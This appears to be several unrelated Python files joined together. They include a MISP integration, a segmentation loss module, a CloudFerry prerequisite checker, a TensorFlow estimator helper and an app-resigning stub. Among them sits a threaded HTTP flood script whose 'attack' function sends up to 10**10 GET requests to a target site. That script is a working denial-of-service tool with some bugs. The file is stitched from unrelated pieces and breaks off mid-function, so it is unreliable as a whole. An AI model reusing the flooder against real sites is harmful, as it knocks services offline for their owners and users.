url_obj.append({'port': url_parse.port}) if url_parse.port else None
url_obj.append(
{'credential': (url_parse.username, url_parse.password)}) if url_parse.username and url_parse.password else None
url_obj.extend(convert_arg_to_misp_args(demisto_args, url_args))
g_object = build_generic_object('url', url_obj)
return add_object(event_id, g_object)
def add_generic_object_command(demisto_args: dict):
event_id = demisto_args.get('event_id')
template = demisto_args.get('template')
attributes = demisto_args.get('attributes').replace("'", '"')
try:
args = json.loads(attributes)
if not isinstance(args, list):
args = dict_to_generic_object_format(args)
obj = build_generic_object(template, args)
return add_object(event_id, obj)
except ValueError as e:
raise DemistoException(
f'`attribute` parameter could not be decoded, may not a valid JSON\nattribute: {attributes}', str(e))
def convert_arg_to_misp_args(demisto_args, args_names):
return [{arg.replace('_', '-'): demisto_args.get(arg)} for arg in args_names if demisto_args.get(arg)]
def add_ip_object(demisto_args: dict):
event_id = demisto_args.get('event_id')
ip_object_args = [
'dst_port',
'src_port',
'domain',
'hostname',
'ip_src',
'ip_dst'
]
# converting args to MISP's arguments types
misp_attributes_args = convert_arg_to_misp_args(demisto_args, ip_object_args)
ips = argToList(demisto_args.get('ip'))
for ip in ips:
misp_attributes_args.append({'ip': ip})
if misp_attributes_args:
non_req_args = [
'first_seen',
'last_seen',
]
misp_attributes_args.extend(convert_arg_to_misp_args(demisto_args, non_req_args))
misp_attributes_args.append({'text': demisto_args.get('comment')}) if demisto_args.get('comment') else None
obj = build_generic_object('ip-port', misp_attributes_args)
return add_object(event_id, obj)
else:
raise DemistoException(
f'None of required arguments presents. command {demisto.command()} requires one of {ip_object_args}')
def handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids):
"""
    Gets 2 sets of tag ids. If an id exists in both sets, it is removed from the
    suspicious tag ids set and kept only in the malicious one (a tag configured as malicious is
    stronger than one recognised as suspicious).
"""
common_ids = set(malicious_tag_ids) & set(suspicious_tag_ids)
suspicious_tag_ids = {tag_id for tag_id in suspicious_tag_ids if tag_id not in common_ids}
return malicious_tag_ids, suspicious_tag_ids
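# Illustrative example (not part of the original code): with malicious_tag_ids = {'1', '2', '3'}
# and suspicious_tag_ids = {'3', '4'}, the shared id '3' is dropped from the suspicious set and
# the function returns ({'1', '2', '3'}, {'4'}).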
def is_tag_list_valid(tag_ids):
"""Gets a list ot tag ids (each one is str), and verify all the tags are valid positive integers."""
for tag in tag_ids:
try:
tag = int(tag)
if tag <= 0:
raise DemistoException(f"Tag id has to be a positive integer, please change the given: '{tag}' id.")
except ValueError:
raise DemistoException(f"Tag id has to be a positive integer, please change the given: '{tag}' id.")
def create_updated_attribute_instance(demisto_args: dict, attribute_uuid: str) -> MISPAttribute:
attribute_type = demisto_args.get('type')
distribution = demisto_args.get('distribution')
category = demisto_args.get('category')
comment = demisto_args.get('comment')
value = demisto_args.get('value')
first_seen = demisto_args.get('first_seen')
last_seen = demisto_args.get('last_seen')
attribute_instance = MISPAttribute()
attribute_instance.uuid = attribute_uuid
if attribute_type:
attribute_instance.type = attribute_type
if distribution:
attribute_instance.distribution = MISP_DISTRIBUTION_TO_IDS[distribution]
if category:
attribute_instance.category = category
if value:
attribute_instance.value = value
if comment:
attribute_instance.comment = comment
if first_seen:
attribute_instance.first_seen = first_seen
if last_seen:
attribute_instance.last_seen = last_seen
return attribute_instance
def update_attribute_command(demisto_args: dict) -> CommandResults:
attribute_uuid = demisto_args.get('attribute_uuid')
attribute_instance = create_updated_attribute_instance(demisto_args, attribute_uuid)
attribute_instance_response = PYMISP.update_attribute(attribute=attribute_instance, attribute_id=attribute_uuid)
if isinstance(attribute_instance_response, dict) and attribute_instance_response.get('errors'):
raise DemistoException(attribute_instance_response.get('errors'))
human_readable = f"## MISP update attribute\nAttribute: {attribute_uuid} was updated.\n"
attribute = attribute_instance_response.get('Attribute')
convert_timestamp_to_readable(attribute, None)
parsed_attribute_data = replace_keys_from_misp_to_context_data(attribute)
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Attribute',
outputs_key_field='ID',
outputs=parsed_attribute_data,
)
def main():
params = demisto.params()
malicious_tag_ids = argToList(params.get('malicious_tag_ids'))
suspicious_tag_ids = argToList(params.get('suspicious_tag_ids'))
reliability = params.get('integrationReliability', 'B - Usually reliable')
if DBotScoreReliability.is_valid_type(reliability):
reliability = DBotScoreReliability.get_dbot_score_reliability_from_str(reliability)
else:
Exception("MISP V3 error: Please provide a valid value for the Source Reliability parameter")
attributes_limit = arg_to_number(params.get('attributes_limit', 20), "attributes_limit", required=True)
command = demisto.command()
demisto.debug(f'[MISP V3]: command is {command}')
args = demisto.args()
try:
malicious_tag_ids, suspicious_tag_ids = handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids)
if command == 'test-module':
return_results(test(malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids,
attributes_limit=attributes_limit))
elif command == 'misp-create-event':
return_results(create_event_command(args))
elif command == 'misp-add-attribute':
return_results(add_attribute(demisto_args=args))
elif command == 'misp-search-events':
return_results(search_events(args))
elif command == 'misp-search-attributes':
return_results(search_attributes(args))
elif command == 'misp-delete-event':
return_results(delete_event(args))
elif command == 'misp-add-sighting':
return_results(add_sighting(args))
elif command == 'misp-add-tag-to-event':
return_results(add_tag(args))
elif command == 'misp-add-tag-to-attribute':
return_results(add_tag(demisto_args=args, is_attribute=True))
elif command == 'misp-remove-tag-from-event':
return_results(remove_tag(args))
elif command == 'misp-remove-tag-from-attribute':
return_results(remove_tag(demisto_args=args, is_attribute=True))
elif command == 'misp-add-events-from-feed':
return_results(add_events_from_feed(demisto_args=args, use_ssl=VERIFY, proxies=PROXIES))
elif command == 'file':
return_results(
generic_reputation_command(args, 'file', 'FILE', malicious_tag_ids, suspicious_tag_ids, reliability,
attributes_limit))
elif command == 'url':
return_results(
generic_reputation_command(args, 'url', 'URL', malicious_tag_ids, suspicious_tag_ids, reliability,
attributes_limit))
elif command == 'ip':
return_results(
generic_reputation_command(args, 'ip', 'IP', malicious_tag_ids, suspicious_tag_ids, reliability,
attributes_limit))
elif command == 'domain':
return_results(
generic_reputation_command(args, 'domain', 'DOMAIN', malicious_tag_ids, suspicious_tag_ids,
reliability, attributes_limit))
elif command == 'email':
return_results(generic_reputation_command(args, 'email', 'EMAIL', malicious_tag_ids, suspicious_tag_ids,
reliability, attributes_limit))
elif command == 'misp-add-file-object':
return_results(add_file_object(args))
elif command == 'misp-add-domain-object':
return_results(add_domain_object(args))
elif command == 'misp-add-url-object':
return_results(add_url_object(args))
elif command == 'misp-add-ip-object':
return_results(add_ip_object(args))
elif command == 'misp-add-object':
return_results(add_generic_object_command(args))
elif command == 'misp-update-attribute':
return_results(update_attribute_command(args))
except PyMISPError as e:
return_error(e.message)
except Exception as e:
return_error(str(e))
if __name__ in ['__main__', '__builtin__', 'builtins']:
main()
| [
"pymisp.tools.FileObject",
"pymisp.tools.GenericObjectGenerator",
"urllib.parse.urlparse",
"urllib3.disable_warnings",
"pymisp.MISPEvent",
"pymisp.ExpandedPyMISP",
"copy.deepcopy",
"pymisp.MISPObject",
"pymisp.MISPAttribute",
"pymisp.MISPSighting"
] | [((1129, 1155), 'urllib3.disable_warnings', 'urllib3.disable_warnings', ([], {}), '()\n', (1153, 1155), False, 'import urllib3\n'), ((1584, 1659), 'pymisp.ExpandedPyMISP', 'ExpandedPyMISP', ([], {'url': 'MISP_URL', 'key': 'MISP_API_KEY', 'ssl': 'VERIFY', 'proxies': 'PROXIES'}), '(url=MISP_URL, key=MISP_API_KEY, ssl=VERIFY, proxies=PROXIES)\n', (1598, 1659), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((7707, 7744), 'pymisp.tools.GenericObjectGenerator', 'GenericObjectGenerator', (['template_name'], {}), '(template_name)\n', (7729, 7744), False, 'from pymisp.tools import GenericObjectGenerator\n'), ((12553, 12581), 'copy.deepcopy', 'copy.deepcopy', (['misp_response'], {}), '(misp_response)\n', (12566, 12581), False, 'import copy\n'), ((17464, 17475), 'pymisp.MISPEvent', 'MISPEvent', ([], {}), '()\n', (17473, 17475), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((33799, 33822), 'copy.deepcopy', 'copy.deepcopy', (['response'], {}), '(response)\n', (33812, 33822), False, 'import copy\n'), ((40516, 40539), 'copy.deepcopy', 'copy.deepcopy', (['response'], {}), '(response)\n', (40529, 40539), False, 'import copy\n'), ((47985, 47999), 'pymisp.MISPSighting', 'MISPSighting', ([], {}), '()\n', (47997, 47999), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((52082, 52103), 'pymisp.tools.FileObject', 'FileObject', (['file_path'], {}), '(file_path)\n', (52092, 52103), False, 'from pymisp.tools import FileObject\n'), ((52438, 52461), 'pymisp.MISPObject', 'MISPObject', (['"""domain-ip"""'], {}), "('domain-ip')\n", (52448, 52461), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((53044, 53057), 'urllib.parse.urlparse', 'urlparse', (['url'], {}), '(url)\n', (53052, 53057), False, 'from urllib.parse import urlparse\n'), ((57209, 57224), 'pymisp.MISPAttribute', 'MISPAttribute', ([], {}), '()\n', (57222, 57224), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((50039, 50050), 'pymisp.MISPEvent', 'MISPEvent', ([], {}), '()\n', (50048, 50050), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n')] |
import torch
from torch.nn import functional as F
from torch import nn
from torch.autograd import Variable
from adet.utils.comm import compute_locations, aligned_bilinear
def dice_coefficient(x, target):
eps = 1e-5
n_inst = x.size(0)
x = x.reshape(n_inst, -1)
target = target.reshape(n_inst, -1)
intersection = (x * target).sum(dim=1)
union = (x ** 2.0).sum(dim=1) + (target ** 2.0).sum(dim=1) + eps
loss = 1. - (2 * intersection / union)
return loss
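# The value above is a soft Dice loss: 1 - 2*sum(x*t) / (sum(x**2) + sum(t**2) + eps) per instance.
# Minimal usage sketch (shapes are illustrative, not from the original file):
#   x = torch.rand(2, 1, 28, 28); t = (torch.rand(2, 1, 28, 28) > 0.5).float()
#   per_instance_loss = dice_coefficient(x, t)  # tensor of shape (2,)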
def lovasz_grad(gt_sorted):
"""
Computes gradient of the Lovasz extension w.r.t sorted errors
See Alg. 1 in paper
"""
p = len(gt_sorted)
gts = gt_sorted.sum()
intersection = gts - gt_sorted.float().cumsum(0)
union = gts + (1 - gt_sorted.float()).cumsum(0)
jaccard = 1. - intersection / union
if p > 1: # cover 1-pixel case
jaccard[1:p] = jaccard[1:p] - jaccard[0:-1]
return jaccard
def lovasz_hinge(logits, labels):
"""
Binary Lovasz hinge loss
logits: [P] Variable, logits at each prediction (between -\infty and +\infty)
labels: [P] Tensor, binary ground truth labels (0 or 1)
"""
if len(labels) == 0:
# only void pixels, the gradients should be 0
return logits.sum() * 0.
signs = 2. * labels.float() - 1.
errors = (1. - logits * Variable(signs))
errors_sorted, perm = torch.sort(errors, dim=0, descending=True)
perm = perm.data
gt_sorted = labels[perm]
grad = lovasz_grad(gt_sorted)
loss = torch.dot(F.relu(errors_sorted), Variable(grad))
return loss
def lovasz_loss(x, target):
eps = 1e-6
n_inst = x.size(0)
x = x.reshape(n_inst, -1)
target = target.reshape(n_inst, -1)
x = torch.clamp(x, min=eps, max=1-eps)
x = torch.log(x) - torch.log(1 - x)
losses = []
for i in range(n_inst):
losses.append(lovasz_hinge(x[i], target[i]))
loss = torch.stack(losses)
return loss
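# Note: lovasz_loss expects per-pixel probabilities in (0, 1); the clamp followed by
# log(x) - log(1 - x) converts them to logits before applying the per-instance hinge above.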
def build_mask_pred(cfg):
return MaskPred(cfg)
class MaskPred(nn.Module):
def __init__(self, cfg):
super(MaskPred, self).__init__()
self.in_channels = cfg.MODEL.EMBEDMASK.MASK_BRANCH.OUT_CHANNELS
self.mask_out_stride = cfg.MODEL.EMBEDMASK.MASK_OUT_STRIDE
soi = cfg.MODEL.FCOS.SIZES_OF_INTEREST
self.register_buffer("sizes_of_interest", torch.tensor(soi + [soi[-1] * 2]))
self.register_buffer("_iter", torch.zeros([1]))
self.mask_loss_type = cfg.MODEL.EMBEDMASK.MASK_LOSS_TYPE
self.mask_loss_alpha = cfg.MODEL.EMBEDMASK.MASK_LOSS_ALPHA
def __call__(self, pixel_embed, mask_feat_stride, pred_instances, gt_instances=None):
if self.training:
self._iter += 1
gt_inds = pred_instances.gt_inds
gt_bitmasks = torch.cat([per_im.gt_bitmasks for per_im in gt_instances])
gt_bitmasks = gt_bitmasks[gt_inds].unsqueeze(dim=1).to(dtype=pixel_embed.dtype)
losses = {}
if len(pred_instances) == 0:
dummy_loss = pixel_embed.sum() * 0 + pred_instances.proposal_embed.sum() * 0 + pred_instances.proposal_margin.sum() * 0
losses["loss_mask"] = dummy_loss
else:
mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride)
if self.mask_loss_type == "Dice":
mask_losses = dice_coefficient(mask_prob, gt_bitmasks)
loss_mask = mask_losses.mean()
elif self.mask_loss_type == "Lovasz":
mask_losses = lovasz_loss(mask_prob, gt_bitmasks)
loss_mask = mask_losses.mean()
losses["loss_mask"] = loss_mask * self.mask_loss_alpha
return losses
else:
if len(pred_instances) > 0:
mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride)
pred_instances.pred_global_masks = mask_prob
return pred_instances
def compute_mask_prob(self, instances, pixel_embed, mask_feat_stride):
proposal_embed = instances.proposal_embed
proposal_margin = instances.proposal_margin
im_inds = instances.im_inds
dim, m_h, m_w = pixel_embed.shape[-3:]
obj_num = proposal_embed.shape[0]
pixel_embed = pixel_embed.permute(0, 2, 3, 1)[im_inds]
proposal_embed = proposal_embed.view(obj_num, 1, 1, -1).expand(-1, m_h, m_w, -1)
proposal_margin = proposal_margin.view(obj_num, 1, 1, dim).expand(-1, m_h, m_w, -1)
mask_var = (pixel_embed - proposal_embed) ** 2
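        # Per-pixel mask probability: exp(-sum_d margin_d * (pixel_embed_d - proposal_embed_d)^2),
        # so pixels whose embedding lies close to the proposal embedding get a probability near 1.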
mask_prob = torch.exp(-torch.sum(mask_var * proposal_margin, dim=3))
assert mask_feat_stride >= self.mask_out_stride
assert mask_feat_stride % self.mask_out_stride == 0
mask_prob = aligned_bilinear(mask_prob.unsqueeze(1), int(mask_feat_stride / self.mask_out_stride))
return mask_prob
| [
"torch.sort",
"torch.log",
"torch.stack",
"torch.tensor",
"torch.cat",
"torch.sum",
"torch.nn.functional.relu",
"torch.autograd.Variable",
"torch.zeros",
"torch.clamp"
] | [((1370, 1412), 'torch.sort', 'torch.sort', (['errors'], {'dim': '(0)', 'descending': '(True)'}), '(errors, dim=0, descending=True)\n', (1380, 1412), False, 'import torch\n'), ((1719, 1755), 'torch.clamp', 'torch.clamp', (['x'], {'min': 'eps', 'max': '(1 - eps)'}), '(x, min=eps, max=1 - eps)\n', (1730, 1755), False, 'import torch\n'), ((1903, 1922), 'torch.stack', 'torch.stack', (['losses'], {}), '(losses)\n', (1914, 1922), False, 'import torch\n'), ((1518, 1539), 'torch.nn.functional.relu', 'F.relu', (['errors_sorted'], {}), '(errors_sorted)\n', (1524, 1539), True, 'from torch.nn import functional as F\n'), ((1541, 1555), 'torch.autograd.Variable', 'Variable', (['grad'], {}), '(grad)\n', (1549, 1555), False, 'from torch.autograd import Variable\n'), ((1762, 1774), 'torch.log', 'torch.log', (['x'], {}), '(x)\n', (1771, 1774), False, 'import torch\n'), ((1777, 1793), 'torch.log', 'torch.log', (['(1 - x)'], {}), '(1 - x)\n', (1786, 1793), False, 'import torch\n'), ((1327, 1342), 'torch.autograd.Variable', 'Variable', (['signs'], {}), '(signs)\n', (1335, 1342), False, 'from torch.autograd import Variable\n'), ((2328, 2361), 'torch.tensor', 'torch.tensor', (['(soi + [soi[-1] * 2])'], {}), '(soi + [soi[-1] * 2])\n', (2340, 2361), False, 'import torch\n'), ((2402, 2418), 'torch.zeros', 'torch.zeros', (['[1]'], {}), '([1])\n', (2413, 2418), False, 'import torch\n'), ((2770, 2828), 'torch.cat', 'torch.cat', (['[per_im.gt_bitmasks for per_im in gt_instances]'], {}), '([per_im.gt_bitmasks for per_im in gt_instances])\n', (2779, 2828), False, 'import torch\n'), ((4622, 4666), 'torch.sum', 'torch.sum', (['(mask_var * proposal_margin)'], {'dim': '(3)'}), '(mask_var * proposal_margin, dim=3)\n', (4631, 4666), False, 'import torch\n')] |
# Copyright 2016 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import getpass
import logging
from cloudferry.lib.base import exception
from cloudferry.lib.base.action import action
from cloudferry.lib.utils import local
from cloudferry.lib.utils import remote_runner
LOG = logging.getLogger(__name__)
class CheckVMAXPrerequisites(action.Action):
"""This verifies prerequisites required for NFS to VMAX iSCSI cinder
volume migration"""
def _iscsiadm_is_installed_locally(self):
LOG.info("Checking if iscsiadm tool is installed")
try:
local.run('iscsiadm --help &>/dev/null')
except local.LocalExecutionFailed:
msg = ("iscsiadm is not available on the local host. Please "
"install iscsiadm tool on the node you running on or "
"choose other cinder backend for migration. iscsiadm is "
"mandatory for migrations with EMC VMAX cinder backend")
LOG.error(msg)
raise exception.AbortMigrationError(msg)
def _check_local_sudo_password_set(self):
current_user = getpass.getuser()
if current_user != 'root' and \
self.cfg.migrate.local_sudo_password is None:
try:
local.sudo('ls')
except local.LocalExecutionFailed:
msg = ("CloudFerry is running as '{user}' user, but "
"passwordless sudo does not seem to be configured on "
"current host. Please either specify password in "
"`local_sudo_password` config option, or run "
"CloudFerry as root user.").format(user=current_user)
LOG.error(msg)
raise exception.AbortMigrationError(msg)
def _ssh_connectivity_between_controllers(self):
src_host = self.cfg.src.ssh_host
src_user = self.cfg.src.ssh_user
dst_host = self.cfg.dst.ssh_host
dst_user = self.cfg.dst.ssh_user
LOG.info("Checking ssh connectivity between '%s' and '%s'",
src_host, dst_host)
rr = remote_runner.RemoteRunner(src_host, src_user)
ssh_opts = ('-o UserKnownHostsFile=/dev/null '
'-o StrictHostKeyChecking=no')
cmd = "ssh {opts} {user}@{host} 'echo ok'".format(opts=ssh_opts,
user=dst_user,
host=dst_host)
try:
rr.run(cmd)
except remote_runner.RemoteExecutionError:
msg = ("No ssh connectivity between source host '{src_host}' and "
"destination host '{dst_host}'. Make sure you have keys "
"and correct configuration on these nodes. To verify run "
"'{ssh_cmd}' from '{src_host}' node")
msg = msg.format(src_host=src_host, dst_host=dst_host, ssh_cmd=cmd)
LOG.error(msg)
raise exception.AbortMigrationError(msg)
def run(self, **kwargs):
if self.cfg.dst_storage.backend != 'iscsi-vmax':
return
self._iscsiadm_is_installed_locally()
self._ssh_connectivity_between_controllers()
self._check_local_sudo_password_set()
| [
"logging.getLogger",
"cloudferry.lib.utils.remote_runner.RemoteRunner",
"cloudferry.lib.utils.local.sudo",
"cloudferry.lib.base.exception.AbortMigrationError",
"cloudferry.lib.utils.local.run",
"getpass.getuser"
] | [((789, 816), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (806, 816), False, 'import logging\n'), ((1627, 1644), 'getpass.getuser', 'getpass.getuser', ([], {}), '()\n', (1642, 1644), False, 'import getpass\n'), ((2639, 2685), 'cloudferry.lib.utils.remote_runner.RemoteRunner', 'remote_runner.RemoteRunner', (['src_host', 'src_user'], {}), '(src_host, src_user)\n', (2665, 2685), False, 'from cloudferry.lib.utils import remote_runner\n'), ((1092, 1132), 'cloudferry.lib.utils.local.run', 'local.run', (['"""iscsiadm --help &>/dev/null"""'], {}), "('iscsiadm --help &>/dev/null')\n", (1101, 1132), False, 'from cloudferry.lib.utils import local\n'), ((1522, 1556), 'cloudferry.lib.base.exception.AbortMigrationError', 'exception.AbortMigrationError', (['msg'], {}), '(msg)\n', (1551, 1556), False, 'from cloudferry.lib.base import exception\n'), ((1780, 1796), 'cloudferry.lib.utils.local.sudo', 'local.sudo', (['"""ls"""'], {}), "('ls')\n", (1790, 1796), False, 'from cloudferry.lib.utils import local\n'), ((3518, 3552), 'cloudferry.lib.base.exception.AbortMigrationError', 'exception.AbortMigrationError', (['msg'], {}), '(msg)\n', (3547, 3552), False, 'from cloudferry.lib.base import exception\n'), ((2266, 2300), 'cloudferry.lib.base.exception.AbortMigrationError', 'exception.AbortMigrationError', (['msg'], {}), '(msg)\n', (2295, 2300), False, 'from cloudferry.lib.base import exception\n')] |
import random
import socket
import string
import sys
import threading
import time
def attack(host: str, port: int = 80, request_count: int = 10 ** 10) -> None:
# Threading support
thread_num = 0
thread_num_mutex = threading.Lock()
# Utility function
def print_status() -> None:
global thread_num
thread_num_mutex.acquire(True)
thread_num += 1
print(f"\n[{time.ctime().split(' ')[3]}] [{str(thread_num)}] Under progress...")
thread_num_mutex.release()
def generate_url_path():
msg = str(string.ascii_letters + string.digits + string.punctuation)
data = "".join(random.sample(msg, 5))
return data
def attack_() -> None:
print_status()
url_path = generate_url_path()
dos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
dos.connect((ip, port))
msg = f"GET /{url_path} HTTP/1.1\nHost: {host}\n\n"
dos.send(msg.encode())
except socket.error:
print(f"[ERROR] Site may be down | {socket.error}")
finally:
dos.shutdown(socket.SHUT_RDWR)
dos.close()
try:
host = host.replace("https://", "").replace("http://", "").replace("www.", "")
ip = socket.gethostbyname(host)
except socket.gaierror:
print("[ERROR] Make sure you entered a correct website!")
sys.exit(2)
all_threads = []
for i in range(request_count):
t1 = threading.Thread(target=attack)
t1.start()
all_threads.append(t1)
time.sleep(0.01)
for current_thread in all_threads:
current_thread.join()
| [
"socket.gethostbyname",
"random.sample",
"time.ctime",
"socket.socket",
"threading.Lock",
"time.sleep",
"sys.exit",
"threading.Thread"
] | [((228, 244), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (242, 244), False, 'import threading\n'), ((794, 843), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (807, 843), False, 'import socket\n'), ((1281, 1307), 'socket.gethostbyname', 'socket.gethostbyname', (['host'], {}), '(host)\n', (1301, 1307), False, 'import socket\n'), ((1493, 1524), 'threading.Thread', 'threading.Thread', ([], {'target': 'attack'}), '(target=attack)\n', (1509, 1524), False, 'import threading\n'), ((1584, 1600), 'time.sleep', 'time.sleep', (['(0.01)'], {}), '(0.01)\n', (1594, 1600), False, 'import time\n'), ((646, 667), 'random.sample', 'random.sample', (['msg', '(5)'], {}), '(msg, 5)\n', (659, 667), False, 'import random\n'), ((1410, 1421), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (1418, 1421), False, 'import sys\n'), ((411, 423), 'time.ctime', 'time.ctime', ([], {}), '()\n', (421, 423), False, 'import time\n')] |
import random
class Yolov3(object):
def __init__(self):
        self.num = 0
        self.input_size = [8, 16, 32]
def __iter__(self):
return self
def __next__(self):
a = random.choice(self.input_size)
        self.num = self.num + 1
        if self.num < 3:
return a
else:
raise StopIteration
yolo=Yolov3()
for data in yolo:
print(data)
| [
"random.choice"
] | [((161, 191), 'random.choice', 'random.choice', (['self.input_size'], {}), '(self.input_size)\n', (174, 191), False, 'import random\n')] |
import googlemaps
gmaps = googlemaps.Client(key='google_key')
def get_markers(address):
geocode_result = gmaps.geocode(address)
return geocode_result[0]['geometry']['location']
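# Illustrative only: gmaps.geocode returns a list of results, so the value returned above is a
# dict like {'lat': <float>, 'lng': <float>} per the Google Geocoding API response format.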
| [
"googlemaps.Client"
] | [((27, 62), 'googlemaps.Client', 'googlemaps.Client', ([], {'key': '"""google_key"""'}), "(key='google_key')\n", (44, 62), False, 'import googlemaps\n')] |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Imports
import os
import numpy as np
import tensorflow as tf
def run(model, X, Y, optimizer=None, nb_epochs=30, nb_batches=128):
"""
Run the estimator
"""
if optimizer is None:
        optimizer = tf.keras.optimizers.SGD(
            lr=0.0009, decay=1e-5, momentum=0.9, nesterov=True)
# 1. Compile the model
model.compile(
optimizer=optimizer, loss='categorical_crossentropy',
metrics=['accuracy'])
# 2. Create an estimator
model_est = tf.keras.estimator.model_to_estimator(
keras_model=model, model_dir='./lenet')
# Training
# 3a. Create the training function
train_input_fn = tf.estimator.inputs.numpy_input_fn(
x={model.input_names[0]: X['train'].astype(np.float32)},
y=Y['train'].astype(np.float32),
batch_size=nb_batches,
num_epochs=nb_epochs,
shuffle=True
)
# 3b. Train the model
model_est.train(input_fn=train_input_fn, steps=nb_epochs*nb_batches)
# Evaluate
# 4a. Evaluate the model
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
x={model.input_names[0]: X['test'].astype(np.float32)},
y=Y['test'].astype(np.float32),
batch_size=nb_batches,
num_epochs=nb_epochs,
shuffle=True
)
# 4b. Evaluate the model
model_eval = model_est.evaluate(input_fn=eval_input_fn)
print(model_eval)
return model_est, model_eval
def run_from_generator(
model, input_func=None, input_func_dict=None,
eval_func_dict=None, nb_epochs=10, optimizer=None, model_dir=None):
"""
Overloaded function to create an estimator using tf.data.Dataset
:param model : uncompiled keras model
:param input_fn : input function providing tf.data.Dataset to the estimator
:param input_fn_dict : dictionary containing input params for input_fn
:param eval_fn_dict : dictionary containing params for eval input_fn
:param model_dir : directory to store the trained model
"""
# 1. Create optimizer and compile model if optimizer is None
if (optimizer is None):
optimizer = tf.keras.optimizers.SGD(
lr=1e-3, decay=1e-5, momentum=0.9, nesterov=True)
# 2. compile the model
model.compile(
optimizer=optimizer, loss='categorical_crossentropy',
metrics=['accuracy'])
# 3. create estimator
dir_path = os.path.join(os.getcwd(), model_dir)
print("Model path chosen : ", dir_path)
if (not os.path.exists(dir_path)):
os.mkdir(dir_path)
print("Creating estimator...")
est = tf.keras.estimator.model_to_estimator(
keras_model=model, model_dir=dir_path)
# 4. Train and Evaluate the model
print("Training...")
# training spec
train_spec = tf.estimator.TrainSpec(input_fn=lambda: input_func(input_func_dict),
max_steps=500)
# evaluation spec
eval_spec = tf.estimator.EvalSpec(input_fn=lambda: input_func(eval_func_dict))
# Run the training
model_est = tf.estimator.train_and_evaluate(est, train_spec, eval_spec)
#est.train(input_fn=lambda: input_func(input_func_dict),
# steps=None)
#
#est.evalute(input_fn=lambda: input_func(eval_func_dict))
return est
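# Sketch of a compatible input_func (assumed shape, not part of the original file): it should
# build a tf.data.Dataset of (features, labels), with features keyed by the Keras model's input name:
#   def input_func(params):
#       features = {params['input_name']: params['x']}
#       ds = tf.data.Dataset.from_tensor_slices((features, params['y']))
#       return ds.shuffle(1024).batch(params['batch_size']).repeat()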
| [
"os.path.exists",
"tensorflow.keras.estimator.model_to_estimator",
"tensorflow.estimator.train_and_evaluate",
"tensorflow.keras.optimizers.SGD",
"os.getcwd",
"os.mkdir",
"tensorflow.keras.estimators.SGD"
] | [((613, 690), 'tensorflow.keras.estimator.model_to_estimator', 'tf.keras.estimator.model_to_estimator', ([], {'keras_model': 'model', 'model_dir': '"""./lenet"""'}), "(keras_model=model, model_dir='./lenet')\n", (650, 690), True, 'import tensorflow as tf\n'), ((2763, 2839), 'tensorflow.keras.estimator.model_to_estimator', 'tf.keras.estimator.model_to_estimator', ([], {'keras_model': 'model', 'model_dir': 'dir_path'}), '(keras_model=model, model_dir=dir_path)\n', (2800, 2839), True, 'import tensorflow as tf\n'), ((3197, 3256), 'tensorflow.estimator.train_and_evaluate', 'tf.estimator.train_and_evaluate', (['est', 'train_spec', 'eval_spec'], {}), '(est, train_spec, eval_spec)\n', (3228, 3256), True, 'import tensorflow as tf\n'), ((327, 403), 'tensorflow.keras.estimators.SGD', 'tf.keras.estimators.SGD', ([], {'lr': '(0.0009)', 'decay': '(1e-05)', 'momentum': '(0.9)', 'nesterov': '(True)'}), '(lr=0.0009, decay=1e-05, momentum=0.9, nesterov=True)\n', (350, 403), True, 'import tensorflow as tf\n'), ((2290, 2365), 'tensorflow.keras.optimizers.SGD', 'tf.keras.optimizers.SGD', ([], {'lr': '(0.001)', 'decay': '(1e-05)', 'momentum': '(0.9)', 'nesterov': '(True)'}), '(lr=0.001, decay=1e-05, momentum=0.9, nesterov=True)\n', (2313, 2365), True, 'import tensorflow as tf\n'), ((2583, 2594), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2592, 2594), False, 'import os\n'), ((2663, 2687), 'os.path.exists', 'os.path.exists', (['dir_path'], {}), '(dir_path)\n', (2677, 2687), False, 'import os\n'), ((2698, 2716), 'os.mkdir', 'os.mkdir', (['dir_path'], {}), '(dir_path)\n', (2706, 2716), False, 'import os\n')] |
""" Represents an app archive. This is an app at rest, whether it's a naked
app bundle in a directory, or a zipped app bundle, or an IPA. We have a
common interface to extract these apps to a temp file, then resign them,
and create an archive of the same type """
import abc
import biplist
from bundle import App, Bundle, is_info_plist_native
from exceptions import MissingHelpers, NotSignable, NotMatched
from distutils import spawn
import logging
import os
from os.path import abspath, dirname, exists, isdir, isfile, join, normpath
import tempfile
import re
from subprocess import call
from signer import Signer
import shutil
import zipfile
REMOVE_WATCHKIT = True
helper_paths = {}
log = logging.getLogger(__name__)
def get_helper(helper_name):
""" find paths to executables. Cached in helper_paths """
